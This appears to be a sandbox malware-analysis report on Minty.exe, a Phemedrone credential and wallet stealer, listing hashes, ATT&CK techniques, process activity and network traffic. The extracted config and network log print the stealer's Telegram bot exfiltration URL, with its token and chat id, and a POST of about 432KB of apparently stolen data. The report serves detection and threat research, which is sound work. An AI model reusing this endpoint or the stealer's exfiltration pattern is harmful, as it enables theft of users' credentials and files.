phemedrone | 18c74dde6426a0637bbdfff078e677fe9813391e7db685735f90cc42ac1cd231

Resubmissions

18/02/2024, 15:25 UTC

240218-stk51abf4z 10

18/02/2024, 15:19 UTC

240218-sp9ykabf2v 10

18/02/2024, 14:45 UTC

240218-r46c9abc7w 10

Analysis

max time kernel
63s
max time network
70s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
18/02/2024, 15:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Minty/Minty.exe
Size

84KB
MD5

6ab9efa8c00bfc58528805978f6e894a
SHA1

944441a3642a47c8b40633462de5876bc3bfb648
SHA256

d8604a6641d5743df9a0324f179476afe197cb63e2b94cbbce78aee2a348b5e1
SHA512

97a12dd1b0cf53b707b7251cbbc1f533fb9f3f9c3244c5f195ceb994a3569c00733580e470a5c43bd811d90e14ab650548a364bd858a00d9672eb4eacb4698a3
SSDEEP

1536:JD9XaiFH+UGPGTLh7CfoWKSO5T3rZ5SwEKSKK9jzpm+:JD9BH+FP+dmpS5TbZ8wEKSKK9jVr

Score

10^/10

phemedrone spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot6678158569:AAGCj_95yYZbARbtI5kniGnlVkd_CTO8lfI/sendMessage?chat_id=6303202637

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe
4596	Minty.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4596	Minty.exe

C:\Users\Admin\AppData\Local\Temp\Minty\Minty.exe
"C:\Users\Admin\AppData\Local\Temp\Minty\Minty.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1700

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

192.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.178.17.96.in-addr.arpa

IN PTR

Response

192.178.17.96.in-addr.arpa

IN PTR

a96-17-178-192deploystaticakamaitechnologiescom
DNS

81.171.91.138.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.171.91.138.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

Minty.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=11827

Minty.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=11827 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 18 Feb 2024 15:19:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 199
Access-Control-Allow-Origin: *
X-Ttl: 46
X-Rl: 43
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

Minty.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
POST

https://api.telegram.org/bot6678158569:AAGCj_95yYZbARbtI5kniGnlVkd_CTO8lfI/sendDocument

Minty.exe

Remote address:

149.154.167.220:443

Request

POST /bot6678158569:AAGCj_95yYZbARbtI5kniGnlVkd_CTO8lfI/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=----------------------------8dc3095147d2cc7
Host: api.telegram.org
Content-Length: 432576
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 18 Feb 2024 15:20:07 GMT
Content-Type: application/json
Content-Length: 933
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

114.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.110.16.96.in-addr.arpa

IN PTR

Response

114.110.16.96.in-addr.arpa

IN PTR

a96-16-110-114deploystaticakamaitechnologiescom
DNS

0.204.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.204.248.87.in-addr.arpa

IN PTR

Response

0.204.248.87.in-addr.arpa

IN PTR

https-87-248-204-0lhrllnwnet

208.95.112.1:80

http://ip-api.com/json/?fields=11827

http

Minty.exe

308 B
468 B
5
2

HTTP Request

GET http://ip-api.com/json/?fields=11827

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot6678158569:AAGCj_95yYZbARbtI5kniGnlVkd_CTO8lfI/sendDocument

tls, http

Minty.exe

448.8kB
12.3kB
368
126

HTTP Request

POST https://api.telegram.org/bot6678158569:AAGCj_95yYZbARbtI5kniGnlVkd_CTO8lfI/sendDocument

HTTP Response

200

8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

192.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

192.178.17.96.in-addr.arpa
8.8.8.8:53

81.171.91.138.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

81.171.91.138.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

Minty.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

Minty.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
8.8.8.8:53

114.110.16.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

114.110.16.96.in-addr.arpa
8.8.8.8:53

0.204.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

0.204.248.87.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4596-0-0x0000000000CE0000-0x0000000000CFC000-memory.dmp

Filesize
112KB

Download
memory/4596-1-0x00007FFC46E40000-0x00007FFC47901000-memory.dmp

Filesize
10.8MB

Download
memory/4596-2-0x000000001BB70000-0x000000001BB80000-memory.dmp

Filesize
64KB

Download
memory/4596-4-0x00007FFC46E40000-0x00007FFC47901000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.